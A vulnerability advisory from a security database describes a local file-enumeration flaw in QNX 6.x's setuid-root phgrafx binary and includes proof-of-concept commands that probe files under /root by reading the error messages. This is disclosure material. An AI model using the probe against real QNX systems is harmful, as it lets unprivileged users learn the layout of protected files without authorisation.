QNX 6.x phgrafx File Enumeration

2014.03.10
Credit: cenobyte
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# QNX 6.x phgrafx file enumeration vulnerability by cenobyte 2013 # <vincitamorpatriae@gmail.com> # # - vulnerability description: # QNX setuid root /usr/photon/bin/phgrafx allows any non-root user to enumerate # files and directories due to opendir() messages. # # - vulnerable platforms: # QNX 6.5.0SP1 # QNX 6.5.0 # QNX 6.4.1 # QNX 6.3.0 # QNX 6.2.0 # # - note: # Leveraging this on QNX versions <= 6.3.0 will result in a core dump. $ id uid=100(user) gid=100 # directory /root/.ph exists: $ /usr/photon/bin/phgrafx -d /root/.ph load_display_conf(): No such file or directory # file /root/.profile exsts: $ /usr/photon/bin/phgrafx -d /root/.profile /root/.profile: opendir(): Not a directory load_display_conf(): Not a directory # /root/doesnotexist does not exist: $ /usr/photon/bin/phgrafx -d /root/doesnotexist /root/doesnotexist: opendir(): No such file or directory load_display_conf(): No such file or directory


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top